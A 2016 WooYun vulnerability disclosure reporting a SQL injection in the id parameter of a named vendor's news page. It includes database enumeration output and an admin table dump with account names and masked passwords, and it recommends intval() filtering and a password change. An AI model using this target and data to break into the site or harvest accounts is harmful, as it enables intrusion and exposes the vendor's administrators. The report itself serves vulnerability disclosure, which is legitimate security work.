当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0195573

漏洞标题:银禾软件又一注入/

相关厂商:银禾软件

漏洞作者: 灰灰灰阔

提交时间:2016-04-13 13:28

修复时间:2016-05-28 13:30

公开时间:2016-05-28 13:30

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

能查数据库,管理员账号密码,明文存储密码

详细说明:

漏洞地址:

http://www.yinhoo.com/news.php?id=41


数据库: 

web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
available databases [5]:
[*] huiwang
[*] information_schema
[*] test
[*] yilinwebdb
[*] yinhoowebdb


Database: huiwang
[25 tables]
+---------------------------+
| user                      |
| action_log                |
| ad_items                  |
| ad_product                |
| adcolumn                  |
| admin                     |
| alimama_items             |
| apply                     |
| apply_user_info           |
| backend_user_view         |
| dictionary                |
| image                     |
| menus                     |
| menus_score_text          |
| product                   |
| product_columns           |
| product_event             |
| product_graded_info       |
| product_preferential      |
| rss_users                 |
| tag                       |
| tag_type                  |
| user_addFavorite_products |
| user_columns              |
| visit_log                 |
+---------------------------+
Database: yilinwebdb
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| subscriptioninfo | 1407    |
| menus            | 41      |
| news             | 14      |
| faqs             | 13      |
| banners          | 4       |
| clientcommend    | 3       |
| webinformation   | 3       |
| subscription     | 2       |
| `user`           | 1       |
+------------------+---------+
Database: yinhoowebdb
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| subscriptioninfo | 1642    |
| menus            | 98      |
| news             | 13      |
| banners          | 10      |
| clientcommend    | 4       |
| webinformation   | 3       |
| subscription     | 2       |
| `user`           | 1       |
+------------------+---------+
Database: huiwang
Table: admin
[2 entries]
+---------+----------+-----------+----------+----------------------+----------------------+-------------+---------------------+---------------------+------------------+
| type_id | admin_id | status_id | password | admin_name           | login_email          | create_user | create_time         | last_update_time    | last_update_user |
+---------+----------+-----------+----------+----------------------+----------------------+-------------+---------------------+---------------------+------------------+
| 1       | 1        | 0         | *** | hui_admin            | [email protected]   | NULL        | 2013-06-14 14:53:57 | 2013-06-14 14:53:57 | NULL             |
| 3       | 42       | 0         | ***   | [email protected] | [email protected] | NULL        | 2013-06-14 16:07:13 | 2013-06-14 16:07:13 | NULL             |
+---------+----------+-----------+----------+----------------------+----------------------+-------------+---------------------+---------------------+------------------+


其他具体数据就不再查了

漏洞证明:

如上

修复方案:

1.数字型使用 intval() 函数过滤
2.改密码
3.也可下载安全狗,加速乐,或其他安全软件

版权声明:转载请注明来源 灰灰灰阔@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:8 (WooYun评价)